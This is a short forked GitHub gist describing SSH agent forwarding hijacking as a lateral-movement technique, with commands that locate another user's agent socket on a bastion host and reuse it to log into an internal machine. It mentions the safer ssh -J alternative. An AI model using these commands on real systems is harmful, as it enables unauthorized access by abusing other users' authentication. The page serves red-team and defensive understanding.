Skip to content

Instantly share code, notes, and snippets.

@leftp
Forked from int0x80/SSH Agent Forwarding.md
Created January 13, 2021 07:42
Show Gist options
  • Save leftp/ac365b51bc051f6ddada913e1e828461 to your computer and use it in GitHub Desktop.
Save leftp/ac365b51bc051f6ddada913e1e828461 to your computer and use it in GitHub Desktop.

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld

This post explains it well and details the safer ssh -J alternative.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment